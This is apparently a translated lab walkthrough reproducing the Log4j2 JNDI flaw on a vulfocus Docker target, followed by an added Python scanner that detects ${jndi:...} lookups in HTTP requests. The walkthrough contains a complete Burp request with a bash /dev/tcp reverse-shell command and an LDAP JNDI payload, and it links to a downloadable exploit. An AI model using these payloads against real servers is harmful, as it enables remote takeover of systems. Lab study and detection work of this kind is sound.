Environment setup:
This vulnerability reproduction uses the vulfocus log4j2 target-range Docker image.
The reproduction experiment is run on a Kali system.
To set up Docker and pull the vulnerable image, see the following link:
/weixin_47019868/article/details/12972
Log4j vulnerability image
Start the environment
Vulnerability verification:
If dnslog shows a callback, the vulnerability exists.
Vulnerability exploitation:
Next, exploit the vulnerability to get a reverse shell. The exp used here comes from an expert in the community; the Baidu Cloud link is below:
Link: /s/1ABBPDmtMQktehVBt5MYwvg  Extraction code: gr3n
Start the LDAP service and the HTTP service on the Kali attacker machine
Construct the payload in Burp Suite
POST /hello HTTP/1.1
Host: 192.168.10.244:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/0101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
Origin: http://192.168.10.244:8080
Connection: close
Referer: http://192.168.10.244:8080/hello
Upgrade-Insecure-Requests: 1
cmd:/bin/bash -c 'bash -i >& /dev/tcp/192.168.10.244/1234 0>&1'

payload=${jndi:ldap://192.168.10.244:3456/TomcatBypass/TomcatEcho}
Listen on port 1234
Sending the request returns 200
Reverse shell obtained!!!
Reference links:
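From the defender's side, the request above is exactly what a WAF rule or log review needs to catch: a ${jndi:...} lookup inside a user-controlled header or form field. The following is an added example, not code from the original post or from vulfocus: it parses a raw HTTP request, decodes form-encoded body fields, and reports every field carrying a JNDI lookup (with scheme, host and port) or a nested lookup that deserves manual inspection. The sample request and its 192.0.2.10 addresses are constructed placeholders.

```python
import re
from urllib.parse import unquote

# ${jndi:<scheme>://<host>[:port]/...}; case-insensitive and whitespace tolerant
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s:]+)(?::(\d+))?[^}]*\}", re.IGNORECASE)
# A lookup nested inside another lookup: legitimate user input never needs this
NESTED_RE = re.compile(r"\$\{[^}]*\$\{")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP request into {'header:<name>': value, 'body:<key>': value}."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    fields = {}
    for line in head.split("\n")[1:]:           # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            fields["header:" + name.strip().lower()] = value.strip()
    for pair in filter(None, body.split("&")):   # x-www-form-urlencoded body
        key, _, value = pair.partition("=")
        fields["body:" + unquote(key)] = unquote(value)
    return fields


def scan_request(raw: str) -> list:
    """Return one finding per field that carries a JNDI lookup or a nested lookup."""
    findings = []
    for where, value in parse_request(raw).items():
        m = JNDI_RE.search(value)
        if m:
            findings.append({"field": where, "kind": "jndi", "scheme": m.group(1).lower(),
                             "host": m.group(2), "port": m.group(3)})
        elif NESTED_RE.search(value):
            findings.append({"field": where, "kind": "nested-lookup", "scheme": None,
                             "host": None, "port": None})
    return findings


# Constructed sample mirroring the shape of the request on the page (placeholder IPs);
# the body is URL-encoded the way a browser or Burp would send it.
SAMPLE = (
    "POST /hello HTTP/1.1\r\n"
    "Host: 192.0.2.10:8080\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "payload=%24%7Bjndi%3Aldap%3A%2F%2F192.0.2.10%3A3456%2FTomcatBypass%2FTomcatEcho%7D"
)

if __name__ == "__main__":
    for finding in scan_request(SAMPLE):
        print(finding)
```

Run the same function over each request in an access log or a WAF capture; any "jndi" finding gives you the callback host to block and hunt for, and any "nested-lookup" finding is a request to pull for manual review.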
/huaflwr/p/15679365.html
/isxiaole/article/details/121912039